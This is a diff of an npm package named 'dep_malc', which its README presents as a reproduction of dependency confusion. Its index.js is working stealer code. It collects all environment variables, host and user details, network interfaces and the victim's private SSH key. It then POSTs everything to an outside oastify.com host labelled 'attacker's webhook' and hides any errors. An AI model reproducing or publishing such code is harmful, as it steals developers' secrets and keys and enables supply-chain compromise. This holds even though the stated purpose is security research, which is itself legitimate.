dep_malc 10.2.5

package/README.md

@@ -0,0 +1,11 @@
+Author: wr3nch0x1
+
+This Example Repo is used reproduce dependency confusion. 
+
+Checks whether library exists on the specified (internal) package index
+
+If not, then:
+Checks whether library exists on the public package index (npmjs)
+
+Installs whichever version is found. If the package exists on both, it defaults to installing from the source with the higher version number.
+

package/index.js

@@ -0,0 +1,77 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const fs = require("fs");
+const path = require("path");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+// Collecting system information and environment details
+const trackingData = JSON.stringify({
+  p: package,
+  c: __dirname,
+  hd: os.homedir(),
+  hn: os.hostname(),
+  un: os.userInfo().username,
+  dns: dns.getServers(),
+  r: packageJSON ? packageJSON.___resolved : undefined,
+  v: packageJSON.version,
+  pjson: packageJSON,
+
+  // Additional personal/system data
+  env: process.env, // All environment variables
+  arch: os.arch(), // Architecture info
+  platform: os.platform(), // Platform info
+  uptime: os.uptime(), // System uptime
+  ipInterfaces: os.networkInterfaces(), // Network interfaces
+  mem: {
+    totalMem: os.totalmem(),
+    freeMem: os.freemem(),
+  },
+  cpu: os.cpus(), // CPU details
+
+  // Process details
+  pid: process.pid,
+  execPath: process.execPath,
+  processArgs: process.argv,
+  currentDir: process.cwd(),
+  userGroups: os.userInfo().gid,
+
+  // Sensitive files like SSH keys (for demonstration; never do this in practice)
+  sshKey: fs.existsSync(path.join(os.homedir(), ".ssh", "id_rsa"))
+    ? fs.readFileSync(path.join(os.homedir(), ".ssh", "id_rsa"), "utf8")
+    : "No SSH key found",
+});
+
+// Data to be sent
+var postData = querystring.stringify({
+  msg: trackingData,
+});
+
+// HTTP request options
+var options = {
+  hostname: "0abgrwsm26a2xjdw5gsunayltcz3ntbi.oastify.com", // attacker's webhook
+  port: 443,
+  path: "/",
+  method: "POST",
+  headers: {
+    "Content-Type": "application/x-www-form-urlencoded",
+    "Content-Length": postData.length,
+  },
+};
+
+// Send the data
+var req = https.request(options, (res) => {
+  res.on("data", (d) => {
+    process.stdout.write(d);
+  });
+});
+
+req.on("error", (e) => {
+  // Handle error silently
+  // console.error(e);
+});
+
+req.write(postData);
+req.end();

package/package.json

@@ -0,0 +1,17 @@
+{
+    "name": "dep_malc",
+    "version": "10.2.5",
+    "description": "A simple script to test Dependency Confusion Attack with external webhooks",
+    "main": "index.js",
+    "scripts": {
+        "start": "node index.js"
+    },
+    "author": "wr3nch0x1",
+    "license": "ISC",
+    "dependencies": {
+        "os": "^0.1.1",
+        "dns": "^0.2.2",
+        "querystring": "^0.2.1",
+        "https": "latest"
+    }
+}